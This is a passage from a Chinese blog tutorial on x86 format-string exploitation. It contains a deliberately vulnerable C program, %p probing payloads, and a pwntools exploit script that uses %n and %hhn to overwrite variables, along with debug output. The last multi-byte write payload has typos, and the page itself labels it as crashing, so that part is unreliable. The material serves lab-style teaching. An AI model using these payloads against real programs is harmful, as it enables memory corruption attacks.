<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-type">int</span> a=<span class="hljs-number">123</span>,b=<span class="hljs-number">456</span>;<br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span>&#123;<br><span class="hljs-type">int</span> c=<span class="hljs-number">789</span>;<br><span class="hljs-type">char</span> s[<span class="hljs-number">100</span>];<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%p\n&quot;</span>,&amp;c);<br><br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">&quot;%s&quot;</span>,s);<br><br><span class="hljs-built_in">printf</span>(s);<br><span class="hljs-keyword">if</span>(c==<span class="hljs-number">16</span>)&#123;<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;modified c.&quot;</span>);<br> &#125;<br><span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (a ==<span class="hljs-number">2</span>)&#123;<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;modified a for a small number.&quot;</span>);<br> &#125;<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(b==<span class="hljs-number">0x12345678</span>)&#123;<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;modified b for a big number!&quot;</span>);<br>&#125;<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br><span class="hljs-comment">//简单的讲一下这个例子，三个整型变量a=123、b=456、c=789。a、b是全局变量，c是局部变量，数组s等待我们从scanf函数输入。可以明显的看</span><br><span class="hljs-comment">//到第二个printf函数存在格式化字符串漏洞。最后是三个判断，如果c=16就打印“modified c.”,如果a=2就打印“modified a for a small</span><br><span class="hljs-comment">//number.”,如果b=0x12345678就打印“modified b for a big number!!”</span><br></code></pre></td></tr></table></figure>

<p>gcc -32进行编译</p>
<h4 id="覆盖栈内存"><a href="#覆盖栈内存" class="headerlink" title="覆盖栈内存"></a>覆盖栈内存</h4><p>这里选择让c&#x3D;16，使程序打印“modified.c”，可以从源码中看到第一次printf打印出了变量c的地址，不需要去找c地址了</p>
<p>首先通过前面的方法来测试c变量在格式化字符串的第几个参数</p>
<figure class="highlight cos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cos">AAAA<span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><span class="hljs-built_in">%p</span><br></code></pre></td></tr></table></figure>

<p>结果：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs asm">lpp@lpp-virtual-machine:~/test$ ./00<br>0xff9d6bec<br>AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p<br>AAAA0xff9d6b880xe9ce97b00x80491ad(nil)0x10x414141410x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x70257025(nil)(nil)0x1000000<br></code></pre></td></tr></table></figure>

<p>可以看出来变量c在格式化字符串的第六个参数，可以根据上面说的公式来构造payload</p>
<figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mel">c_addr+%012d+%6$n<br></code></pre></td></tr></table></figure>

<p>第一个是变量c的地址，可以通过接受第一次printf打印的字符来获得，因为前面的c_addr已经占了4个字节，第二个的%012d是为了补全十六个字节，最后的%6$n是为了向第六个参数内写16，这个16就是前面的16个字节，因为前面两个已经成功输出了16个字符，%6$n把成功输出的十六个字符的字符个数16对应的整形指针（这里是变量c的指针）参数所指的变量。也就是变量c。<br>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>sh=process(<span class="hljs-string">&#x27;./00&#x27;</span>)<br>c_addr=<span class="hljs-built_in">int</span>(sh.recvuntil(<span class="hljs-string">&#x27;\n&#x27;</span>,drop=<span class="hljs-literal">True</span>),<span class="hljs-number">16</span>)<span class="hljs-comment">#获取c变量的地址</span><br><span class="hljs-built_in">print</span> (<span class="hljs-built_in">hex</span>(c_addr))<br>payload=p32(c_addr)+<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">12</span> +<span class="hljs-string">b&#x27;%6$n&#x27;</span><span class="hljs-comment">#payload</span><br>sh.sendline(payload)<br><span class="hljs-built_in">print</span> (sh.recv())<br>sh.interactive()<span class="hljs-comment">#%n,不输出字符，但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量</span><br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs asm">lpp@lpp-virtual-machine:~/test$ python3 00.py<br>[+] Starting local process &#x27;./00&#x27; argv=[b&#x27;./00&#x27;] : pid 5471<br>/home/lpp/test/00.py:4: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes<br>  c_addr=int(sh.recvuntil(&#x27;\n&#x27;,drop=True),16)#获取c变量的地址<br>[DEBUG] Received 0xb bytes:<br>    b&#x27;0xffcb057c\n&#x27;<br>0xffcb057c<br>[DEBUG] Sent 0x15 bytes:<br>    00000000  7c 05 cb ff  61 61 61 61  61 61 61 61  61 61 61 61  │|···│aaaa│aaaa│aaaa│<br>    00000010  25 36 24 6e  0a                                     │%6$n│·│<br>    00000015<br>[*] Process &#x27;./00&#x27; stopped with exit code 0 (pid 5471)<br>[DEBUG] Received 0x1c bytes:<br>    00000000  7c 05 cb ff  61 61 61 61  61 61 61 61  61 61 61 61  │|···│aaaa│aaaa│aaaa│<br>    00000010  6d 6f 64 69  66 69 65 64  20 63 2e 0a               │modi│fied│ c.·│<br>    0000001c<br>b&#x27;|\x05\xcb\xffaaaaaaaaaaaamodified c.\n&#x27;<br>[*] Switching to interactive mode<br>[*] Got EOF while reading in interactive<br>$ <br><br></code></pre></td></tr></table></figure>

<p>确实成功输出modified.c了</p>
<h4 id="覆盖任意地址内存"><a href="#覆盖任意地址内存" class="headerlink" title="覆盖任意地址内存"></a>覆盖任意地址内存</h4><h5 id="覆盖小数字"><a href="#覆盖小数字" class="headerlink" title="覆盖小数字:"></a>覆盖小数字:</h5><p>小是小于机器字长，假设要向变量中存一个2的话，如果靠覆盖栈内存这种方法的话就失效了，%n会将前面输入的字节数存放到指定的参数地址中，我们将地址放到了最前面，p32小端序转化后本身就会占4个字节，所以经过%n写入的一定会大于等于4，就不能去存2，还是上面那个例子，我们令a&#x3D;2，去输出puts(“modified a for a small number.”);</p>
<p>但是地址一定要放在最前面吗？<br>%n是可以向指定的参数地址写入数字的，把payload改一下</p>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-string">&#x27;aa%k$naa&#x27;</span>+<span class="hljs-function"><span class="hljs-title">p32</span>(<span class="hljs-variable">a_addr</span>)</span><br></code></pre></td></tr></table></figure>

<p>看起来毫无逻辑，改进</p>
<figure class="highlight scheme"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scheme"><span class="hljs-symbol">&#x27;aa%k</span><span class="hljs-symbol">&#x27;+</span><span class="hljs-symbol">&#x27;$naa</span><span class="hljs-symbol">&#x27;+p32</span>(<span class="hljs-name">a_addr</span>)<br></code></pre></td></tr></table></figure>

<p>把前面的字符串拆分成两个部分，每个部分四个字节，因为变量是从第六个参数开始的，所以aa%k是第六个，%naa是第七个，p32(a_addr)是第八个，所以k需要改成8这样%n就会将‘aa’这两个字符的字符数2写在第八个参数，即变量a的地址中</p>
<h5 id="覆盖大数字："><a href="#覆盖大数字：" class="headerlink" title="覆盖大数字："></a>覆盖大数字：</h5><p>%k$n前面有多少字节，就会向第k个参数地址中写多少，我们能覆盖的大数字有多大呢，上面的例子b&#x3D;0x12345678举例，换成十进制就是305419896个字节，我们没办法构建一个超极长的payload的插入栈中，因为栈的长度基本不会这么长。</p>
<p>所以我们可以进行分开写入，存放变量b的地址空间有四个字节:</p>
<p>因为在x86，x64中按照小端序的形式进行存储，所以以b_addr作为基地址开始，依次从右向左在每个字节中写入内容，也就是说我们不必须一次性把变量b的所有位置填满，可以一个字节一个字节的填充，这样的填充方法需要用到格式化字符串的两个标志位：<br>h:     对于整数类型，printf期待一个从short提升的int尺寸的整型参数</p>
<p>hh:   对于整数类型，printf期待一个从char提升的int尺寸的整型参数</p>
<p>简单说如果去使用了h标志位，那么就会向变量b中一次性写两个字节，写两次填满，使用hh标志位会向变量b中一次性写一个字节，写四次填满，所以</p>
<p>思路：如果b_addr放在格式化字符串的第六个参数，b_addr+1放在第七个参数，b_addr+2放在第八个参数，b_addr+3放在第九个参数的位置，再通过%6hhn，%7hhn，&amp;8hhn%，9hhn将0x78，0x56，0x34，0x12写进去理论上就可以完成对变量b的四个字节的填充b&#x3D;0x12345678，然后寻找b的地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">payload=p32(b_addr)+p32(b_addr+<span class="hljs-number">1</span>)+p32(b_addr+<span class="hljs-number">2</span>)+p32(b_addr+<span class="hljs-number">3</span>)<br><br>payload+=<span class="hljs-string">b&#x27;%104x&#x27;</span>+<span class="hljs-string">b&#x27;%6$hhn&#x27;</span>+<span class="hljs-string">b&#x27;%222x&#x27;</span>+<span class="hljs-string">b&#x27;%7hhn&#x27;</span>+<span class="hljs-string">b&#x27;%222x&#x27;</span>+<span class="hljs-string">b&#x27;%8hhn&#x27;</span>+<span class="hljs-string">b&#x27;222x&#x27;</span>+<span class="hljs-string">b&#x27;%9hhn&#x27;</span><br></code></pre></td></tr></table></figure>


  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89"><span class="toc-number">1.</span> <span class="toc-text">格式化字符串漏洞进阶（x86）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%A0%88%E5%8F%98%E9%87%8F%E5%AF%B9%E5%BA%94%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2"><span class="toc-number">1.0.1.</span> <span class="toc-text">获取栈变量对应的字符串</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%84%E9%9C%B2%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%85%E5%AD%98"><span class="toc-number">1.0.2.</span> <span class="toc-text">泄露任意地址内存</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A6%86%E7%9B%96%E5%86%85%E5%AD%98"><span class="toc-number">1.0.3.</span> <span class="toc-text">覆盖内存</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A6%86%E7%9B%96%E6%A0%88%E5%86%85%E5%AD%98"><span class="toc-number">1.0.4.</span> <span class="toc-text">覆盖栈内存</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A6%86%E7%9B%96%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%85%E5%AD%98"><span class="toc-number">1.0.5.</span> <span class="toc-text">覆盖任意地址内存</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A6%86%E7%9B%96%E5%B0%8F%E6%95%B0%E5%AD%97"><span class="toc-number">1.0.5.1.</span> <span class="toc-text">覆盖小数字:</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A6%86%E7%9B%96%E5%A4%A7%E6%95%B0%E5%AD%97%EF%BC%9A"><span class="toc-number">1.0.5.2.</span> <span class="toc-text">覆盖大数字：</span></a></li></ol></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&text="><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&title="><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&is_video=false&description="><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&title="><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&title="><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&title="><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&title="><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&name=&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&t="><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    luyanpei
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
